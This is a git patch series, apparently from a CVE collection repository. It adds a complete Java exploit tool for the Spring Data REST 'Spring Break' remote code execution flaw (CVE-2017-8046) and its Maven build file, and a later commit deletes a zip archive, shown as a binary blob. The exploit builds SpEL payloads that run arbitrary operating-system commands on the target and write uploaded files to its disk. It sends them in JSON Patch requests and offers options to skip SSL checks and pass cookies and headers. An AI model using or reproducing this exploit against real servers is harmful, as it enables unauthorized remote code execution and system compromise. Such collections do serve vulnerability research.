+ private static String JSON_PATCH_OBJECT = "[{ \"op\" : \"remove\", \"path\" : \"%s\", \"value\" : \"pwned\" }]";
+
+ /**
+ * This is a way to bypass the split and 'replace'
+ * logic performed by the framework on slashes.
+ */
+ private static String SLASH = "(new java.lang.String(new char[]{0x2F}))";
+
+ /**
+ * Malicious SpEL-script for executing commands.
+ */
+ private static String COMMAND_PAYLOAD;
+ static {
+ COMMAND_PAYLOAD = "T(org.springframework.util.StreamUtils).copy(";
+ COMMAND_PAYLOAD += "T(java.lang.Runtime).getRuntime().exec(";
+ COMMAND_PAYLOAD += "(";
+ COMMAND_PAYLOAD += "T(java.lang.System).getProperty(\\\"os.name\\\").toLowerCase().contains(\\\"win\\\")";
+ COMMAND_PAYLOAD += "?";
+ COMMAND_PAYLOAD += "\\\"cmd \\\"+" + SLASH + "+\\\"c \\\"";
+ COMMAND_PAYLOAD += ":";
+ COMMAND_PAYLOAD += "\\\"\\\"";
+ COMMAND_PAYLOAD += ")+";
+ COMMAND_PAYLOAD += "%s"; // The encoded command will be placed here.
+ COMMAND_PAYLOAD += ").get%sStream()";
+ COMMAND_PAYLOAD += ",";
+ COMMAND_PAYLOAD += "T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes()";
+ COMMAND_PAYLOAD += ".getResponse().getOutputStream()";
+ COMMAND_PAYLOAD += ").x";
+ }
+
+ /**
+ * Malicious SpEL-script for uploading files (like scripts, binaries, etc).
+ */
+ private static String FILEUPLOAD_PAYLOAD;
+ static {
+ // Classes java.nio.file.* are only available in Java 7+.
+ FILEUPLOAD_PAYLOAD = "T(java.nio.file.Files).write(";
+ FILEUPLOAD_PAYLOAD += "T(java.nio.file.Paths).get(%s),";
+ FILEUPLOAD_PAYLOAD += "T(java.util.Base64).getDecoder().decode(\\\"%s\\\")";
+ FILEUPLOAD_PAYLOAD += ").x";
+ }
+
+ /**
+ * Error cause string that can be used to "clean the response."
+ */
+ private static String ERROR_CAUSE = "{\"cause";
+
+ /**
+ * Constant that will be used to get input stream.
+ */
+ private static String INPUT_STREAM = "Input";
+
+ /**
+ * Constant that will be used to get error stream.
+ */
+ private static String ERROR_STREAM = "Error";
+
+ /**
+ * The target URL.
+ */
+ private URI url;
+
+ /**
+ * Whether to skipSSL or not, default set to false
+ */
+ private boolean skipSSL;
+
+ /**
+ * The command that will be executed on the remote machine.
+ */
+ private String command;
+
+ /**
+ * Cookies that will be passed.
+ */
+ private String cookies;
+
+ /**
+ * Flag used to remove error messages in output due to
+ * the usage of the exploit. It could hide error messages
+ * if the request fails for other reasons.
+ */
+ private boolean cleanResponse;
+
+ /**
+ * This flag can be used to retrieve the error stream
+ * in case the launched remote command fails unexpectedly.
+ */
+ private boolean errorStream;
+
+ /**
+ * Verbosity flag.
+ */
+ private boolean verbose;
+
+ /**
+ * Custom headers that will be passed.
+ */
+ private List customHeaders = new ArrayList();
+
+ /**
+ * Path that will point to a file on the local filesystem, which will be uploaded. Uploads cannot be used in conjunction with commands in the
+ * same request.
+ */
+ private File localFileToUpload;
+
+ /**
+ * Server will upload the file to this location, e.g. /tmp or C:\TEMP. This path
+ * will be encoded to ensure that Spring will not convert slashes to dots.
+ */
+ private String remoteUploadDirectory;
+
+ /**
+ * Default constructor.
+ */
+ public SpringBreakCve20178046() {
+ this.verbose = false;
+ this.cleanResponse = false;
+ this.errorStream = false;
+ this.skipSSL = false;
+ }
+
+ /**
+ * Performs the exploit.
+ *
+ * @throws IOException
+ * If something bad occurs during HTTP GET.
+ */
+ public void exploit() throws IOException {
+ checkInput();
+ printInput();
+ String payload = preparePayload();
+ String response = httpPatch(payload);
+ printOutput(response);
+ }
+
+ /**
+ * Checks the input.
+ */
+ private void checkInput() {
+ if (this.url == null) {
+ throw new IllegalArgumentException("URL must be passed.");
+ }
+
+ if ((isEmpty(this.command) && this.localFileToUpload == null) || (!isEmpty(this.command) && this.localFileToUpload != null)) {
+ throw new IllegalArgumentException("Either a command must be passed, or a file must be selected for upload.");
+ }
+ }
+
+ /**
+ * Prints input if verbose flag is true.
+ */
+ private void printInput() {
+ if (isVerbose()) {
+ System.out.println("[*] Target URL ........: " + this.url);
+ if (!isEmpty(this.command)) {
+ System.out.println("[*] Command ...........: " + this.command);
+ }
+ if (this.localFileToUpload != null) {
+ System.out.println("[*] File to upload ....: " + this.localFileToUpload.getAbsolutePath());
+ if (!isEmpty(this.remoteUploadDirectory)) {
+ System.out.println("[*] Remote upload dir .: " + this.remoteUploadDirectory);
+ }
+ }
+ System.out.println("[*] Cookies ...........: " + (isEmpty(this.cookies) ? "(no cookies)" : this.cookies));
+ System.out.println("[*] Headers ...........: " + (this.customHeaders == null || this.customHeaders.isEmpty() ? "(no headers)" : "(" + this.customHeaders.size() + " headers)"));
+ if (this.customHeaders != null && !this.customHeaders.isEmpty()) {
+ for (String header : this.customHeaders) {
+ System.out.println(" > " + header);
+ }
+ }
+ System.out.println("[*] Clean response ....: " + this.cleanResponse);
+ System.out.println("[*] Ret error stream ..: " + this.errorStream);
+ System.out.println("[*] Verbose ...........: " + this.verbose);
+ }
+ }
+
+ /**
+ * Prepares the payload.
+ *
+ * @return The malicious payload that will be injected.
+ */
+ private String preparePayload() {
+ System.out.println("[*] Preparing payload.");
+ String payload = null;
+
+ // Send a command to the server:
+ if (!isEmpty(this.command)) {
+ String encodedCommand = encode(this.command); // Encoding inserted command.
+ String maliciousSpEL = String.format(COMMAND_PAYLOAD, encodedCommand, isErrorStream() ? ERROR_STREAM : INPUT_STREAM);
+ payload = String.format(JSON_PATCH_OBJECT, maliciousSpEL); // Placing payload into JSON Patch object.
+ }
+
+ // Upload a file to the server:
+ else if (this.localFileToUpload != null) {
+ try {
+ // Remote preparing filename / directory.
+ String filename = this.localFileToUpload.getName();
+ if (remoteUploadDirectory != null) {
+ filename = remoteUploadDirectory + filename;
+ filename = encode(filename);
+ }
+
+ // Reading file content to byte[] instead of string avoids potential text encoding issues.
+ byte[] rawFileContent = FileUtils.readFileToByteArray(this.localFileToUpload);
+ String encodedFileContent = Base64.encodeBase64String(rawFileContent);
+ String maliciousSpEL = String.format(FILEUPLOAD_PAYLOAD, filename, encodedFileContent);
+ payload = String.format(JSON_PATCH_OBJECT, maliciousSpEL);
+
+ } catch (IOException e) {
+ throw new RuntimeException(e);
+ }
+ }
+
+ if (isVerbose()) {
+ System.out.println("[*] Payload ...........: " + payload);
+ }
+
+ return payload;
+ }
+
+ /**
+ * Encodes the inserted command.
+ *
+ * @return The encoded command.
+ */
+ private String encode(String command) {
+ StringBuffer encodedCommand = new StringBuffer("(new java.lang.String(new char[]{");
+
+ int commandLength = command.length();
+ for (int i = 0; i < commandLength; i++) {
+ encodedCommand.append((int) command.charAt(i));
+ if (i + 1 < commandLength) {
+ encodedCommand.append(",");
+ }
+ }
+
+ encodedCommand.append("}))");
+
+ if (isVerbose()) {
+ System.out.println("[*] Encoded command ...: " + encodedCommand.toString());
+ }
+
+ return encodedCommand.toString();
+ }
+
+ /**
+ * HTTP PATCH operation on the target passing the malicious payload.
+ *
+ * @param payload
+ * The malicious payload.
+ * @return The response as a string.
+ * @throws IOException
+ * If something bad occurs during HTTP GET.
+ */
+ private String httpPatch(String payload) throws IOException {
+ System.out.println("[*] Sending payload.");
+
+ // Preparing PATCH operation.
+ HttpClientBuilder clientBuilder = HttpClientBuilder.create();
+
+ // Disable SSL Verification
+ if(this.url.getScheme().equalsIgnoreCase("https") && this.skipSSL){
+ try{
+ SSLContextBuilder sslBuilder = new SSLContextBuilder();
+ sslBuilder.loadTrustMaterial(null, new TrustSelfSignedStrategy());
+ // Since certificates contain hostnames, not ip addresses, if we try https://ipAddress
+ // a SSLPeerUnverifiedException would be thrown because hostname in certificate does not match
+ // ip used in https://ipAddress, to avoid that error we need to use the overloaded constructor taking as second arg NoopHostnameVerifier.
+ SSLConnectionSocketFactory sslConnectionFactory = new SSLConnectionSocketFactory(sslBuilder.build(), NoopHostnameVerifier.INSTANCE);
+ clientBuilder.setSSLSocketFactory(sslConnectionFactory);
+ } catch(Exception exception) {
+ // Errors that may be thrown: KeyManagementException, KeyStoreException, NoSuchAlgorithmException, SSLPeerUnverifiedException
+ throw new RuntimeException(exception);
+ }
+ }
+
+ HttpClient client = clientBuilder.build();
+
+ HttpPatch patch = new HttpPatch(this.url);
+ patch.setHeader("User-Agent", "Mozilla/5.0");
+ patch.setHeader("Accept-Language", "en-US,en;q=0.5");
+ patch.setHeader("Content-Type", "application/json-patch+json"); // This is a JSON Patch.
+ if (!isEmpty(this.cookies)) {
+ patch.setHeader("Cookie", this.cookies);
+ }
+ if (!customHeaders.isEmpty()) {
+ for (String header : this.customHeaders) {
+ String key = header.split(":")[0];
+ String value = header.split(":")[1];
+ patch.setHeader(key, value);
+ }
+ }
+ patch.setEntity(new StringEntity(payload));
+
+ // Response string.
+ StringBuffer response = new StringBuffer();
+
+ // Executing PATCH operation.
+ HttpResponse httpResponse = client.execute(patch);
+ if (httpResponse != null) {
+
+ // Reading response code.
+ if (httpResponse.getStatusLine() != null) {
+ int responseCode = httpResponse.getStatusLine().getStatusCode();
+ System.out.println("[*] HTTP " + responseCode);
+ } else {
+ System.out.println("[!] HTTP response code can't be read.");
+ }
+
+ // Reading response content.
+ if (httpResponse.getEntity() != null && httpResponse.getEntity().getContent() != null) {
+ BufferedReader in = new BufferedReader(new InputStreamReader(httpResponse.getEntity().getContent()));
+ String inputLine;
+
+ while ((inputLine = in.readLine()) != null) {
+ response.append(inputLine);
+ response.append(System.getProperty("line.separator"));
+ }
+ in.close();
+ } else {
+ System.out.println("[!] HTTP response content can't be read.");
+ }
+
+ } else {
+ System.out.println("[!] HTTP response is null.");
+ }
+
+ return response.toString();
+ }
+
+ /**
+ * Prints output.
+ *
+ * @param response
+ * Response that will be printed.
+ */
+ private void printOutput(String response) {
+ if (!isEmpty(response)) {
+ System.out.println("[*] vvv Response vvv");
+
+ // Cleaning response (if possible).
+ if (isCleanResponse() && response.contains(ERROR_CAUSE)) {
+ String cleanedResponse = response.split("\\" + ERROR_CAUSE)[0];
+ System.out.println(cleanedResponse);
+ } else {
+ System.out.println(response);
+ }
+
+ System.out.println("[*] ^^^ ======== ^^^");
+ }
+ }
+
+ /**
+ * Checks if an input string is null/empty or not.
+ *
+ * @param input
+ * The input string to check.
+ * @return True if the string is null or empty, false otherwise.
+ */
+ private boolean isEmpty(String input) {
+ boolean isEmpty;
+
+ if (input == null || input.trim().length() < 1) {
+ isEmpty = true;
+ } else {
+ isEmpty = false;
+ }
+
+ return isEmpty;
+ }
+
+ /* Getters and setters. */
+
+ public boolean isVerbose() {
+ return verbose;
+ }
+
+ public void setVerbose(boolean verbose) {
+ this.verbose = verbose;
+ }
+
+ public void setUrl(String url) throws URISyntaxException {
+ if (isEmpty(url)) {
+ throw new IllegalArgumentException("URL must be not null and not empty.");
+ }
+
+ this.url = new URI(url.trim());
+ }
+
+ public void setCommand(String command) {
+ if (isEmpty(command)) {
+ throw new IllegalArgumentException("Command must be not null and not empty.");
+ }
+
+ this.command = command.trim();
+ }
+
+ public void setCookies(String cookies) {
+ if (cookies != null) {
+ cookies = cookies.trim();
+ }
+
+ this.cookies = cookies;
+ }
+
+ public void setSkipSSL(boolean skipSSL){
+ this.skipSSL = skipSSL;
+ }
+
+ public void setCustomHeader(String customHeader) {
+ if (customHeader != null && customHeader.contains(":") && !customHeader.startsWith(":") && !customHeader.endsWith(":")) {
+ customHeader = customHeader.trim();
+ this.customHeaders.add(customHeader);
+ }
+ }
+
+ public boolean isCleanResponse() { + return cleanResponse; + } + + public void setCleanResponse(boolean cleanResponse) { + this.cleanResponse = cleanResponse; + } + + public boolean isErrorStream() { + return errorStream; + } + + public void setErrorStream(boolean errorStream) { + this.errorStream = errorStream; + } + + public void setLocalFileToUpload(String localFileToUpload) { + if (isEmpty(localFileToUpload)) { + throw new IllegalArgumentException("Filename must not be null and not empty."); + } + + File upload = new File(localFileToUpload); + if (!upload.exists() || !upload.isFile() || !upload.canRead()) { + throw new IllegalArgumentException("File to upload does not exist or is not readable: " + upload.getAbsolutePath()); + } + + this.localFileToUpload = upload; + } + + public void setRemoteUploadDirectory(String remoteUploadDirectory) { + if (!remoteUploadDirectory.endsWith("/")) { + remoteUploadDirectory += "/"; + } + this.remoteUploadDirectory = remoteUploadDirectory; + } + + /** + * Shows the program help. + */ + public static final void help() { + System.out.println("Usage:"); + System.out.println(" java -jar spring-break_cve-2017-8046.jar [options]"); + System.out.println("Description:"); + System.out.println(" Exploiting 'Spring Break' Remote Code Execution (CVE-2017-8046)."); + System.out.println("Options:"); + System.out.println(" -h, --help"); + System.out.println(" Prints this help and exits."); + System.out.println(" -u, --url [target_URL]"); + System.out.println(" The target URL where the exploit will be performed."); + System.out.println(" You have to choose an existent resource."); + System.out.println(" -cmd, --command [command_to_execute]"); + System.out.println(" The command that will be executed on the remote machine."); + System.out.println(" -U, --upload [file_to_upload]"); + System.out.println(" File to upload to the remote machine. Will be uploaded to the current working"); + System.out.println(" directory of the Java process. 
Warning: this will only succeed on a server running"); + System.out.println(" JRE-1.7 or later."); + System.out.println(" --remote-upload-directory [/some/existing/path/]"); + System.out.println(" Optional. Server will attempt to write the uploaded file to this directory on the"); + System.out.println(" filesystem. Specified directory must exist and be writeable."); + System.out.println(" --cookies [cookies]"); + System.out.println(" Optional. Cookies passed into the request, e.g. authentication cookies."); + System.out.println(" -H, --header [custom_header]"); + System.out.println(" Optional. Custom header passed into the request, e.g. authorization header."); + System.out.println(" -k"); + System.out.println(" Skip SSL validation"); + System.out.println(" --clean"); + System.out.println(" Optional. Removes error messages in output due to the usage of the"); + System.out.println(" exploit. It could hide error messages if the request fails for other reasons."); + System.out.println(" --error-stream"); + System.out.println(" Optional. In case of errors the command will fail and the error stream will"); + System.out.println(" not be returned. This option can be used to relaunch the remote command"); + System.out.println(" returning the error stream."); + System.out.println(" -v, --verbose"); + System.out.println(" Optional. Increase verbosity."); + } + + /** + * Main method. 
+ * + * @param args + * Input arguments + */ + public static void main(String[] args) { + try { + System.out.println("'Spring Break' RCE (CVE-2017-8046) - " + VERSION); + SpringBreakCve20178046 o = new SpringBreakCve20178046(); + + if (args.length > 0) { + for (int i = 0; i < args.length; i++) { + + String p = args[i]; + + if (("-h".equals(p) || "--help".equals(p)) && i == 0) { + SpringBreakCve20178046.help(); + return; + } else if ("-u".equals(p) || "--url".equals(p)) { + + if (i + 1 > args.length - 1) { + throw new IllegalArgumentException("URL must be passed."); + } + o.setUrl(args[++i]); + + } else if ("-U".equals(p) || "--upload".equals(p)) { + + if (i + 1 > args.length - 1) { + throw new IllegalArgumentException("File must be passed, if specified."); + } + o.setLocalFileToUpload(args[++i].trim()); + + } else if ("--remote-upload-directory".equals(p)) { + + if (i + 1 > args.length - 1) { + throw new IllegalArgumentException("Remote directory must be passed, if specified."); + } + o.setRemoteUploadDirectory(args[++i].trim()); + + } else if ("-cmd".equals(p) || "--command".equals(p)) { + + if (i + 1 > args.length - 1) { + throw new IllegalArgumentException("Command must be passed."); + } + o.setCommand(args[++i]); + + } else if ("--cookies".equals(p)) { + + if (i + 1 > args.length - 1) { + throw new IllegalArgumentException("Cookies must be passed, if specified."); + } + o.setCookies(args[++i]); + + } else if ("-k".equals(p)) { + + o.setSkipSSL(true); + + } else if ("-H".equals(p) || "--header".equals(p)) { + + if (i + 1 > args.length - 1) { + throw new IllegalArgumentException("Custom header must be passed, if specified."); + } + o.setCustomHeader(args[++i]); + + } else if ("--clean".equals(p)) { + o.setCleanResponse(true); + } else if ("--error-stream".equals(p)) { + o.setErrorStream(true); + } else if ("-v".equals(p) || "--verbose".equals(p)) { + o.setVerbose(true); + } + + } + + // Performing the exploit. 
+ o.exploit(); + + } else { // Wrong number of arguments. + SpringBreakCve20178046.help(); + return; + } + + } catch (URISyntaxException use) { + System.out.println("[!] Input error (URI syntax exception): " + use.getMessage()); + } catch (IllegalArgumentException iae) { + System.out.println("[!] Input error (illegal argument): " + iae.getMessage()); + } catch (Exception e) { + System.out.println("[!] Unexpected exception: " + e.getMessage()); + e.printStackTrace(); + } + } + +} diff --git a/cve/java-spring/2017/CVE-2017-8046/pom.xml b/cve/java-spring/2017/CVE-2017-8046/pom.xml new file mode 100644 index 00000000..0cb3f6ed --- /dev/null +++ b/cve/java-spring/2017/CVE-2017-8046/pom.xml @@ -0,0 +1,68 @@ + + 4.0.0 + com.afs.exploit + spring-break_cve-2017-8046 + 1.3 + spring-break_cve-2017-8046 + This is a Java program that exploits Spring Break vulnerability (CVE-2017-8046). + + 1.7 + 1.7 + + + src/main/java + + + maven-compiler-plugin + 3.1 + + + + + + + org.apache.maven.plugins + maven-assembly-plugin + + + package + + single + + + + + com.afs.exploit.spring.SpringBreakCve20178046 + + + + jar-with-dependencies + + + + + + + + + + org.apache.httpcomponents + httpclient + 4.5.5 + + + + + commons-io + commons-io + 2.6 + + + https://github.com/m3ssap0/spring-break_cve-2017-8046 + \ No newline at end of file -- Gitee From 110b6b3d54f852f23961f8905fef5f20f495e3bf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 10 Apr 2023 10:57:17 +0000 Subject: [PATCH 05/13] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/java-spring/2017/CVE-2017-8046/spring-break=5Fcve-2017-8046-m?= =?UTF-8?q?aster.zip?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../spring-break_cve-2017-8046-master.zip | Bin 12833 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/java-spring/2017/CVE-2017-8046/spring-break_cve-2017-8046-master.zip 
diff --git a/cve/java-spring/2017/CVE-2017-8046/spring-break_cve-2017-8046-master.zip b/cve/java-spring/2017/CVE-2017-8046/spring-break_cve-2017-8046-master.zip deleted file mode 100644 index 078e924350cf580703b34d31477354a894198a3b..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12833 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 
